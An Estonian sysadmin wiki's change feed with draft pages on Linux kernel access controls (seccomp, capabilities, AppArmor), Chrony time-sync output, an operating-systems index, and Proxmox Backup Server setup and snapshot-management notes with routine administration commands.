* http://www.debian.org/distrib/packages
* http://debian.org/doc/maint-guide
* http://www.debianadmin.com/
* http://debian.catsanddogs.com/
* http://debconf9.debconf.org/ - sisaldab videosalvestusi Debiani arendajate esinemistest DebConfidel
* http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/lenny/current/
* http://debian-live.alioth.debian.org/
* http://www.emdebian.org/

Linux kernel kontrollib tegevusi

2026-05-03T22:44:04Z

Imre: /* Kasulikud lisamaterjalid */

Linux kernel kontrollib tegevusi

2026-05-03T22:42:04Z

Imre:

Linux kernel kontrollib tegevusi

2026-05-03T22:40:09Z

Imre: /* Tööpõhimõte */

Linux kernel kontrollib tegevusi

2026-05-03T22:33:42Z

Imre: /* Tööpõhimõte */

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* system call (syscall, 'make system call') -

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===Kasulikud lisamaterjalid===

* TODO

Linux kernel kontrollib tegevusi

2026-05-03T22:33:24Z

Imre: Uus lehekülg: '===Sissejuhatus=== TODO ===Mõisted=== * seccomp * capabilities * dac/acl * lsm ===Tööpõhimõte=== Väited * üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada) * system call (syscall, 'make system call') - Joonis <pre> töötav protsess -> syscall liides -> kernel -> ressurss ^ ^ ^...'

===Sissejuhatus===

TODO

===Mõisted===

* seccomp
* capabilities
* dac/acl
* lsm

===Tööpõhimõte===

Väited

* üldiselt tahab protsess kasutada mingit ressurssi ja seda on vaja kontrollida (nt peab süsteem otsustama, kas seda kasutamist lubada)
* system call (syscall, 'make system call') -

Joonis

<pre>
töötav protsess -> syscall liides -> kernel -> ressurss

^ ^ ^
| | |
| | |

seccomp tulemüür capabilities lsm (apparmor)
dac
</pre>

kus

* systemd - tegeleb seccomp ja capabilities rakendamisega
* apparmor - tegeleb lsm rakendamisega

===Kasulikud lisamaterjalid===

* TODO

Operatsioonisüsteemid

2026-05-03T22:26:07Z

Imre:

Debian GNU/Linux

* [[:AMD/ATI videokaardi kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:NVIDIA videokaardi kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:X.Org kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:GNOME kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:Xfce kasutamine operatsioonisüsteemiga Debian]]
* [[:Wayland kasutamine operatsioonisüsteemiga Debian Jessie]]
* [[:Operatsioonisüsteemi Debian GNU/Linux kasutamine]]
* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* [[:Pulseaudio kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Rsyslog kasutamine operatsioonisüsteemiga Debian]]
* [[:Vsftpd kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Kasutajakeskkond operatsioonisüsteemis Debian Squeeze]]
* [[:Wifi kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:GRUB2 alglaaduri kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:boot manager systemd-boot kasutamine]]
* [[:udev kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Printeri kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Syslog-ng kasutamine operatsioonisüsteemiga Debian]]
* [[:Debian Squeeze SELinux kasutamine]]
* [[:Operatsioonisüsteemi Debian Squeeze käivitamine NFS ressursilt]]
* [[:Kui Linux operatsioonisüsteem ei tööta hästi]]
* [[:ClearOS kasutamine]]
* [[:Operatsioonisüsteemi Debian Jessie käivitamine iSCSI ressursilt]]
* [[:LightDM kasutamine]]
* [[:systemd kasutamine]]
* [[:apt-mirror kasutamine]]
* [[:reprepro kasutamine]]
* [[:AppArmor kasutamine operatsioonisüsteemiga Debian]]
* [[:Auditd kasutamine operatsioonisüsteemiga Debian]]
* [[:Polkit kasutamine operatsioonisüsteemiga Debian]]
* [[:Operatsioonisüsteem Debian v. 10 Buster kasutamine]]

Ubuntu

* [[:Operatsioonisüsteemi Ubuntu kasutamine]]
* [[:Operatsioonisüsteemi Ubuntu kasutamine töökohaarvutis]]
* [[:SNAP kasutamine operatsioonisüsteemiga Ubuntu v. 18.04]]

FreeBSD

* [[:Operatsioonisüsteemi FreeBSD kasutamine]]
* [[:Debian GNU/kFreeBSD kasutamine]]
* [[:Project Trident kasutamine töökohaarvutis]]
* [[:FreeBSD kasutamine töökohaarvutis]]

OpenBSD

* [[:Operatsioonisüsteemi OpenBSD kasutamine]]
* [[:OpenBSD spamd tarkvara kasutamine]]
* [[:Multiboot OpenBSD süsteemi uuendamine]]
* [[:OpenBSD kasutamine töökohaarvutis]]
* [[:Multi boot Linux + OpenBSD UEFI + GPT + software raid keskkonnas]]

RedHat

* [[:Redhat Enterprise Linux v4 kasutamine]]
* [[:Redhat Enterprise Linux v5 kasutamine]]
* [[:Redhat Enterprise Linux v6 kasutamine]]
* [[:Redhat Enterprise Linux v7 kasutamine]]
* [[:CentOS v6 kasutamine]]
* [[:CentOS v7 kasutamine]]

SLES

* [[:SLES 11 kasutamine]]

Windows

* [[:Zabbix agendi kasutamine Windows 7 operatsioonisüsteemiga]]
* [[:Windows XP kasutamine]]
* [[:Windows 2012 serveri kasutamine AD domeenikontrollerina]]
* [[:Windows 2012 serveri kasutamine Exchange 2010 SP3 postimasinana]]

Android

* [[:Sony Ericsson Xperia Pro kasutamine tarkvaraga CyanogenMod]]

Misc

* [[:Zentyal kasutamine]]
* [[:Generic kaasaegne operatsioonisüsteem]]
* [[:Trinity Rescue Kit]]
* [[:SystemRescueCd]]
* [[:TPM kasutamine]]
* [[:OmniOS kasutamine]]
* [[:FreeDOS kasutamine]]
* [[:IKT lahendusel põhineva teenuse käitamine]]
* [[:xrdp serveri kasutamine]]
* [[:Linux perf kasutamine]]
* [[:eBPF ja BCC utiliitide kasutamine]]
* [[:Arch Linux]]
* [[:Jõudluse mõõtmine]]
* [[:Osnexus]]
* [[:Mattermost]]
* [[Passwork]]
* [[:Linux kernel namespace]]
* [[:Linux kernel kontrollib tegevusi]]

UEFI

* [[:UEFI]]
* [[:UEFI Secure Boot kasutamisest üldiselt]]
* [[:UEFI Secure Boot kasutamine virtuaalse riistvaraga OVMF]]
* [[:UEFI Secure Boot kasutamine füüsilise riistvaraga]]
* [[:UEFI Secure Boot kasutamine töökohaarvutis]]

Hugepages

* [[:Hugepages üldiselt]]
* [[:Hugepages ja Proxmox PVE]]
* [[:Hugepages ja PostgreSQL]]

Mac

* [[:Power Mac G5 kasutamine operatsioonisüsteemiga Debian]]
* [[:Mac OS X operatsioonisüsteemi kasutamine KVM guestina]]
* [[:Mac OS X operatsioonisüsteemi kasutamine VirtualBox guestina]]
* [[:MacOS operatsioonisüsteemi kasutamine füüsilise MacBook Air M4 arvutiga]]

Kellaaeg

* [[:Kellaaeg üldiselt]]
* [[:NTP]]
* [[:NTS]]
* [[:PTP]]
* [[:Chrony]]

Chrony

2026-05-03T18:57:04Z

Imre: /* Misc - chrony teenus */

Chrony

2026-05-03T18:55:32Z

Imre: /* Misc */

Chrony

2026-05-03T17:36:42Z

Imre:

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc===

chronyd protsessi info

<pre>
root@pve-svc-02:~# pgrep chronyd
1436092
1436093
root@pve-svc-02:~# lsns -p 1436093
NS TYPE NPROCS PID USER COMMAND
4026531833 net 481 1 root /sbin/init
4026531834 time 481 1 root /sbin/init
4026531835 cgroup 481 1 root /sbin/init
4026531836 pid 481 1 root /sbin/init
4026531837 user 481 1 root /sbin/init
4026531839 ipc 481 1 root /sbin/init
4026533035 mnt 2 1436092 _chrony ├─/usr/sbin/chronyd -F 1
4026533036 uts 2 1436092 _chrony └─/usr/sbin/chronyd -F 1
</pre>

kus

<pre>
root@pve-svc-02:~# cat /proc/1436092/status | grep -i seccomp
Seccomp: 2
Seccomp_filters: 23

root@pve-svc-02:~# nsenter -m -t 1436092 findmnt | grep inacc | sed -r 's/tmpfs\s+.*//'
│ └─/dev/kmsg tmpfs[/systemd/inaccessible/chr]
│ ├─/run/credentials tmpfs[/systemd/inaccessible/dir]
│ ├─/run/user tmpfs[/systemd/inaccessible/dir]
├─/root tmpfs[/systemd/inaccessible/dir]
├─/home tmpfs[/systemd/inaccessible/dir]
├─/usr/lib/modules tmpfs[/systemd/inaccessible/dir]
</pre>

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Chrony

2026-05-03T17:33:08Z

Imre: Uus lehekülg: '===Sissejuhatus=== TODO ===Tööpõhimõte=== TODO ===Misc=== chrony sources info <pre> root@pve-svc-02:~# chronyc sources -v -n .-- Source mode '^' = server, '=' = peer, '#' = local clock. / .- Source state '*' = current best, '+' = combined, '-' = not combined, | / 'x' = may be in error, '~' = too variable, '?' = unusable. || .- xxxx [ yyyy ] +/- zzzz || Reachability register (octal) -....'

===Sissejuhatus===

TODO

===Tööpõhimõte===

TODO

===Misc===

chrony

sources info

<pre>
root@pve-svc-02:~# chronyc sources -v -n

.-- Source mode '^' = server, '=' = peer, '#' = local clock.
/ .- Source state '*' = current best, '+' = combined, '-' = not combined,
| / 'x' = may be in error, '~' = too variable, '?' = unusable.
|| .- xxxx [ yyyy ] +/- zzzz
|| Reachability register (octal) -. | xxxx = adjusted offset,
|| Log2(Polling interval) --. | | yyyy = measured offset,
|| \ | | zzzz = estimated error.
|| | | \
MS Name/IP address Stratum Poll Reach LastRx Last sample
===============================================================================
^* 10.192.0.53 4 9 377 413 -135us[ -216us] +/- 3171us
</pre>

tracking info

<pre>
root@pve-svc-02:~# chronyc tracking
Reference ID : 0AC00035 (10.192.0.53)
Stratum : 5
Ref time (UTC) : Sun May 03 17:25:18 2026
System time : 0.000016197 seconds slow of NTP time
Last offset : -0.000080330 seconds
RMS offset : 0.000049475 seconds
Frequency : 0.712 ppm fast
Residual freq : -0.006 ppm
Skew : 0.085 ppm
Root delay : 0.006004042 seconds
Root dispersion : 0.000445185 seconds
Update interval : 517.6 seconds
Leap status : Normal
</pre>

===Kasulikud lisamaterjalid===

* TODO

Operatsioonisüsteemid

2026-05-03T17:30:06Z

Imre:

Debian GNU/Linux

* [[:AMD/ATI videokaardi kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:NVIDIA videokaardi kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:X.Org kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:GNOME kasutamine operatsioonisüsteemiga Debian Wheezy]]
* [[:Xfce kasutamine operatsioonisüsteemiga Debian]]
* [[:Wayland kasutamine operatsioonisüsteemiga Debian Jessie]]
* [[:Operatsioonisüsteemi Debian GNU/Linux kasutamine]]
* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* [[:Pulseaudio kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Rsyslog kasutamine operatsioonisüsteemiga Debian]]
* [[:Vsftpd kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Kasutajakeskkond operatsioonisüsteemis Debian Squeeze]]
* [[:Wifi kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:GRUB2 alglaaduri kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:boot manager systemd-boot kasutamine]]
* [[:udev kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Printeri kasutamine operatsioonisüsteemiga Debian Squeeze]]
* [[:Syslog-ng kasutamine operatsioonisüsteemiga Debian]]
* [[:Debian Squeeze SELinux kasutamine]]
* [[:Operatsioonisüsteemi Debian Squeeze käivitamine NFS ressursilt]]
* [[:Kui Linux operatsioonisüsteem ei tööta hästi]]
* [[:ClearOS kasutamine]]
* [[:Operatsioonisüsteemi Debian Jessie käivitamine iSCSI ressursilt]]
* [[:LightDM kasutamine]]
* [[:systemd kasutamine]]
* [[:apt-mirror kasutamine]]
* [[:reprepro kasutamine]]
* [[:AppArmor kasutamine operatsioonisüsteemiga Debian]]
* [[:Auditd kasutamine operatsioonisüsteemiga Debian]]
* [[:Polkit kasutamine operatsioonisüsteemiga Debian]]
* [[:Operatsioonisüsteem Debian v. 10 Buster kasutamine]]

Ubuntu

* [[:Operatsioonisüsteemi Ubuntu kasutamine]]
* [[:Operatsioonisüsteemi Ubuntu kasutamine töökohaarvutis]]
* [[:SNAP kasutamine operatsioonisüsteemiga Ubuntu v. 18.04]]

FreeBSD

* [[:Operatsioonisüsteemi FreeBSD kasutamine]]
* [[:Debian GNU/kFreeBSD kasutamine]]
* [[:Project Trident kasutamine töökohaarvutis]]
* [[:FreeBSD kasutamine töökohaarvutis]]

OpenBSD

* [[:Operatsioonisüsteemi OpenBSD kasutamine]]
* [[:OpenBSD spamd tarkvara kasutamine]]
* [[:Multiboot OpenBSD süsteemi uuendamine]]
* [[:OpenBSD kasutamine töökohaarvutis]]
* [[:Multi boot Linux + OpenBSD UEFI + GPT + software raid keskkonnas]]

RedHat

* [[:Redhat Enterprise Linux v4 kasutamine]]
* [[:Redhat Enterprise Linux v5 kasutamine]]
* [[:Redhat Enterprise Linux v6 kasutamine]]
* [[:Redhat Enterprise Linux v7 kasutamine]]
* [[:CentOS v6 kasutamine]]
* [[:CentOS v7 kasutamine]]

SLES

* [[:SLES 11 kasutamine]]

Windows

* [[:Zabbix agendi kasutamine Windows 7 operatsioonisüsteemiga]]
* [[:Windows XP kasutamine]]
* [[:Windows 2012 serveri kasutamine AD domeenikontrollerina]]
* [[:Windows 2012 serveri kasutamine Exchange 2010 SP3 postimasinana]]

Android

* [[:Sony Ericsson Xperia Pro kasutamine tarkvaraga CyanogenMod]]

Misc

* [[:Zentyal kasutamine]]
* [[:Generic kaasaegne operatsioonisüsteem]]
* [[:Trinity Rescue Kit]]
* [[:SystemRescueCd]]
* [[:TPM kasutamine]]
* [[:OmniOS kasutamine]]
* [[:FreeDOS kasutamine]]
* [[:IKT lahendusel põhineva teenuse käitamine]]
* [[:xrdp serveri kasutamine]]
* [[:Linux perf kasutamine]]
* [[:eBPF ja BCC utiliitide kasutamine]]
* [[:Arch Linux]]
* [[:Jõudluse mõõtmine]]
* [[:Osnexus]]
* [[:Mattermost]]
* [[Passwork]]
* [[:Linux kernel namespace]]

UEFI

* [[:UEFI]]
* [[:UEFI Secure Boot kasutamisest üldiselt]]
* [[:UEFI Secure Boot kasutamine virtuaalse riistvaraga OVMF]]
* [[:UEFI Secure Boot kasutamine füüsilise riistvaraga]]
* [[:UEFI Secure Boot kasutamine töökohaarvutis]]

Hugepages

* [[:Hugepages üldiselt]]
* [[:Hugepages ja Proxmox PVE]]
* [[:Hugepages ja PostgreSQL]]

Mac

* [[:Power Mac G5 kasutamine operatsioonisüsteemiga Debian]]
* [[:Mac OS X operatsioonisüsteemi kasutamine KVM guestina]]
* [[:Mac OS X operatsioonisüsteemi kasutamine VirtualBox guestina]]
* [[:MacOS operatsioonisüsteemi kasutamine füüsilise MacBook Air M4 arvutiga]]

Kellaaeg

* [[:Kellaaeg üldiselt]]
* [[:NTP]]
* [[:NTS]]
* [[:PTP]]
* [[:Chrony]]

Proxmox Backup Server

2026-05-02T12:42:56Z

Imre: /* 2026 kevad märkused */

===Sissejuhatus===

TODO

===Mõisted===

* PBS - Proxmox Backup Server
* PVE - Proxmox Virtualization Environment
* DS - datastore
* NS - namespace
* GC - garbage collect
* Purne -

===Tööpõhimõte===

Väited

* PBS vaikimisi pakib, st ei ole mõtet kasutada PBS storage juures pakkivat failisüsteemi vms (nt 'zfs create -o compression=lz4 ...' vms; tundub, et failisüstteemi pakkimise kasutmine ei muuda varundamiseks kuluvat aega ega mahtu, aga pbs serverile tekib natuke rohkem cpu koormust)
* PBS tegleb ise pakkimisega ja paistab, et seda ei saagi välja lülitada (nt proxmox pve webgui haldusliideses backup käivitamise on 'Compression: ZSTD (fast and good)' greyed-out
* mitu PSB serverit saab omavahel nö kokku aheldada, tulemusena tekib mitme etapiline varundus (varundus varundab varundust)

Kasutusalad

* varundatud ja riknenud arvuti asendamine varundusest taastatud arvutiga
* varundatud arvuti taastamine teisse proxmox klastrisse (nt kontrolli või uuringu eesmärgil)

Üks võimalik kasutusjuhtum

<pre>
CLTARTU

pve-tartu-1 pve-tartu-2 pve-tartu-n
__________________ __________________ __________________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|
| | |
| | |
-----------|-----------------|------|---------------------|--|-----------
| |
| | |
| _______|_______ ________|________
| | | | |
'---------> | ns-tartu | <------- | ns-tartu |
| | | |
| pbs-tartu-1st | | pbs-tallinn-2nd |
| | | |
,---------> | ns-tallinn | <------- | ns-tallinn |
| |_______________| |_________________|
| | |
| | |
| |
----------|------------------|------|---------------------|-|---------------
| | |
| | |
________|_________ _________|________ ________|_________
| | | | | |
| vm1 (vmid=1001) | | vm3 (vmid=1003) | | vm5 (vmid=1005) |
| vm2 (vmid=1002) | | vm4 (vmid=1004) | | vm6 (vmid=1006) |
|__________________| |__________________| |__________________|

pve-tallinn-1 pve-tallinn-2 pve-tallinn-n

CLTALLINN
</pre>

kus

* pve-1, 2 ja 3 on proxmox virtual environment host arvutid
* vm1, vm2 ... vm6 on pve peal töötavad virtuaalsed arvutid
* pbs-1st on proxmox backup server abil realiseeritud esimese taseme varundus
* pbs-2nd on proxmox backup server abil realiseeritud teise taseme varundus
* pve-1 ... 3 peavad reeglina asuma samas subnetis
* pbs-1st ja 2nd ei pea asuma samas subnetis pve arvutitega ega ise üksteisega
* CLTARTU ja CLTALLINN - PVE klastrite nimed

Varundamisega seotud võrguliiklus

* andmeliikluse algamise mõttes pöörduvad nii vmN arvutid kui pbs-2nd arvuti pbs-1st arvuti poole

===Paigaldamine===

TODO

===Seadistamine===

TODO

====Datastore lisamine - pbs ja webgui====

Järgneva eelduseks on, et pbs on paigaldatud ning arvutis on üks kasutamata /dev/vdc vms plokkseade. Datastore on võimalik seadistada pbs webgui liidese abil

Administration -> Storage/Disks -> Directory -> Create: Directory

ning avanenud dialoogis täita lahtrid

* Disk - /dev/vdc
* Filesystem - ext4
* Name - ds-pbs-tmp
* Add as Datastore - linnutada

Tulemusena tekitatakse systemd mount objekt, mis monteerib failisüsteemi /mnt/datastore alamkataloogiks

<pre>
# cat /etc/systemd/system/mnt-datastore-ds\\x2dpbs\\x2dtmp.mount
[Unit]
Description=Mount datatstore 'ds-pbs-tmp' under '/mnt/datastore/ds-pbs-tmp'

[Install]
WantedBy=multi-user.target

[Mount]
Options=defaults
Type=ext4
What=/dev/disk/by-uuid/5d52fefc-212a-45dc-ab68-dc55dc3ed051
Where=/mnt/datastore/ds-pbs-tmp
</pre>

mis täpsemalt paistab nii

<pre>
# df -t ext4 -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/pbs-root 21G 1.8G 19G 9% /
/dev/vdc1 108G 258M 102G 1% /mnt/datastore/ds-pbs-tmp
</pre>

ning lisaks võetakse kasutusele datastore'ina

<pre>
# cat /etc/proxmox-backup/datastore.cfg
datastore: ds-pbs-tmp
path /mnt/datastore/ds-pbs-tmp
</pre>

Siin on mitu nö probleemi

* ketas partitsioneeritakse - see teeb ebamugavaks /dev/vdc suurendamise, käigult ei saagi hästi suurendada
* süsteemis osa failisüsteeme monteeritakse /etc/fstab abil ja osa systemd vahenditega
* /mnt alune on üldiselt natuke ebaloomulik koht püsivaks kasutuseks asjade pidamiseks (/mnt on ad hoc monteerimisteks, ja /srv püsivateks) - vt https://en.wikipedia.org/wiki/Filesystem_Hierarchy_Standard

====Datastore lisamine - käsitsi ja webgui====

Ehk otsekohesem ja ka suurema kontrolli tulemuse üle saab nö tavalisel viisil monteerides /etc/fstab abil /srv/pbs alla failisüsteemi ning siis webgui pealt seadistada pbs tarkvara seda kasutama.

# pvcreate /dev/vdc
# vgcreate vg_pbs /dev/vdc
# lvcreate -l +100%FREE -n srv_pbs vg_pbs
# mkfs.ext4 /devv/vg_pbs/srv_pbs
# # cat /etc/fstab
...
/dev/vg_pbs/srv_pbs /srv/pbs ext4 defaults 0 0
# mkdir /srv/pbs
# mount /srv/pbs

ext4 failisüsteemi kasutamisel kasutatakse veel nö vahel lisaks lvm kihti, see teeb võimalikud muudatused sujuvamaks, nt saab kunagi plokkseadme asendada käigult pvmove abil.

Kui /srv/pbs kataloogi alla on failisüsteem monteeritud, siis sobib webgui peal öelda

Datastore -> Add Datastore

ning täita lahtrid

* Name - ds-pbs
* Backing Path: /srv/pbs

===Kasutamine - varundamine===

TODO

Seadistatud ja varundamisega tegelevas PBS serveris on muu hulgas sellised failid

* datastore'ide kirjeldus - /etc/proxmox-backup/datastore.cfg
* proxmox kasutajatega seotud andmed - shadow.json, user.cfg ja acl.cfg
* 2nd stage kopeerimise ligipääsu kirjeldus - /etc/proxmox-backup/remote.cfg

===Kasutatamine - taastamine===

TODO

===Haldamine===

Tundub, et pbs tarkvara juhtimiseks on kaks käivitusskripti, seiskamiseks

# systemctl stop proxmox-backup-proxy
# systemctl stop proxmox-backup

käivitamiseks

# systemctl stop proxmox-backup
# systemctl stop proxmox-backup-proxy

proxmox-backup-proxy kuulab 8007 võrku, apt teenus jms

<pre>
root@varundus-2nd:/srv# netstat -lnpt | grep backup
tcp 0 0 127.0.0.1:82 0.0.0.0:* LISTEN 3461/proxmox-backup
tcp6 0 0 :::8007 :::* LISTEN 3476/proxmox-backup

root@varundus-2nd:/srv# ps aux | grep 3476
backup 3476 16.6 1.6 844856 51096 ? Ssl 21:59 0:32 /usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-proxy
</pre>

Andmesalvestuse asukohtade jms seadistused asuvad failis

<pre>
root@pbs:~# cat /etc/proxmox-backup/datastore.cfg
datastore: ds_zpool_wds_pbs
comment
gc-schedule daily
path /zpool_wdc/pbs
prune-schedule daily
...
</pre>

===PBS schedule kasutamine===

Väited

* virtuaalsete arvutite regulaarsed varundamised seadistatakse Proxmox VE keskkonnas (nt proxmox hostide webgui haldusliidestes)
* varundamine toimib proxmox host algatusel
* varundatud varunduste regulaarne harvendamine toimub proxmox backup serveri webgui haldusliideses seadistatu alusel; ja pbs algatusel
* Prune - tegeleb nö kataloogist vana varunduse eemaldamisega
* GC (garbage collection) - tegeleb kataloogist kustatule vastavate andmete osa vabastamisega salvestusseadmelt

====Regulaarsete varundamiste seadistamine - PVE====

Virtuaalse arvuti regulaarse varundamise seadistamiseks sobib virtuaalse arvuti juures veenduda, et plokkseadmete juures ei ole märget

backup=0

Seejärel avada

Datacenter -> Backup -> Add (või Edit kui juba on olemas)

ning linnutada ära sobiv arvuti.

====Regulaarsete kustutamise seadistamine - PBS====

Logida sisse varundamise arvutisse ja valida

Datastore -> ds_nimi -> Prune & GC

ning seadistada Prune rutiin

* Keep Last
* Keep Hourly
* ..
* Keep Yearly

ning seadistada Prune ja CG alguse aeg.

====Protected====

Vaikimisi prunemine kustutab hiljem või varem kõik varundused ära. Kui soovitakse mõnda seisu (olgu see moodustunud automaatselt või käsitsi) säilitada lõpmatult kaua, siis sobib märkida ta Protected olekusse. Seda saab teha PVE 7.1 webgui liideses, ja PBS v. 2.1 webgui liidses

Datastore -> ds_nimi -> Content -> Group -> snapshot

* group - virtuaalne arvuti
* snapshot - konkreetsele ajale vastav varundus

Kõigi toimunud varunduste protected olekusse seadistamiseks sobib öelda

<pre>
# export PBS_PASSWORD="xxx"
# cat pbs-protected.sh
for i in `proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep "^vm"`; do
for j in `proxmox-backup-client snapshot list ${i} --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff | awk {'print $2'} | grep ^vm`; do
proxmox-backup-client snapshot protected update ${j} true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff;
done;
done

# sh pbs-protected.sh
</pre>

Edukast tulemusest annab tunnistust varunduste Content vaates, et snaphost real on Protected pildike muutunud hallist roheliseks.

====Prune simulator====

Aadressil https://pbs.proxmox.com/docs/prune-simulator/ asub tore simulaator, mille abil illustreeritakse milliseid konkreetseid varundusi prunemine tabab.

====Märkused====

Varundamise kasutamine võib olla lihtsam ja varundus kvaliteetsem (kooskõlalisem) kui varundatavate arvutite failisüsteemid ei ole laiali määritud mitmele plokkseadmele (nt lvm volume group asub ühel virtio plokkseadmel).

====Kasulikud lisamaterjalid====

* https://pbs.proxmox.com/docs/prune-simulator/

===PVE integreeritud varunduse kasutamine proxmox-backup-client abil===

PVE integreeritud varunduse kasutamiseks on vaja

* varundatud andmeid PBS serveris
* varunduse serverile üle nn api port 8007 liidese ligipääsu
* teada datastore nime varunduse arvutis
* nö klientarvutit kuhu on paigaldatud proxmox-backup-client tarkvara (see võiks olla nö kolmas arvuti, st mitte pbs ega varundatud arvuti ise)

Varundatud arvutite nimekirja küsimine (nn group'id)

# proxmox-backup-client list --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
Password for "pm60-trt@pbs":

Varundatud arvuti varunduste nimekirja küsimine (nn snapshot'id)

<pre>
# proxmox-backup-client snapshot list vm/194 --output-format text --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
┌─────────────────────────────┬────────┬────────────────────────────────────────────────────────────────────────────┐
│ snapshot │ size │ files │
╞═════════════════════════════╪════════╪════════════════════════════════════════════════════════════════════════════╡
│ vm/194/2021-01-02T13:23:12Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-01-02T14:26:53Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
├─────────────────────────────┼────────┼────────────────────────────────────────────────────────────────────────────┤
│ vm/194/2021-10-09T20:59:42Z │ 34 GiB │ client.log drive-virtio0.img drive-virtio1.img index.json qemu-server.conf │
└─────────────────────────────┴────────┴────────────────────────────────────────────────────────────────────────────┘
</pre>

Protection muutmine

# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z true --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client snapshot protected update vm/194/2021-01-02T13:23:12Z false --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

Tõmmise kasutamine

# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio0.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio1.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff
# proxmox-backup-client map vm/106/2021-02-20T21:27:29Z drive-virtio2.img --repository pm60-trt@pbs@192.168.99.199:ds_zpool_wds_pbs_coff

kui virtuaalses arvuti on moodustatud neile nt lvm, siis tuleks öelda

# vgchange -a y
# lvdisplay
# mount -o ro,norecovery /dev/sys/root /mnt/root

Seejärel saab /mnt/root alt kasutada varundatud seisu nii nagu tavalist read-only failisüsteemi. Kasutamise lõpetamiseks sobib öelda

# umount /mnt/root
# vgchange -a n
# proxmox-backup-client unmap drive-virtio0.img
# proxmox-backup-client unmap drive-virtio1.img
# proxmox-backup-client unmap drive-virtio2.img

ilma viimase argumendita esitatakse mapped ressursside nimekiri

<pre>
# proxmox-backup-client unmap
/dev/loop26: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio2.img
/dev/loop25: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio1.img
/dev/loop24: pm60-trt@pbs@192.168.99.199:8007:ds_zpool_wds_pbs_coff:vm/106/2021-02-20T21:27:29Z/drive-virtio0.img
</pre>

proxmox-backup-client nn kolmanda arvuti ettevalmistamine

Esmalt paigaldada Ubuntu 20.04 või Debian v. 10 või v. 11 nö tavaliselt viisil. Seejärel lisada repo võti, nt Ubuntu 20.04 puhul

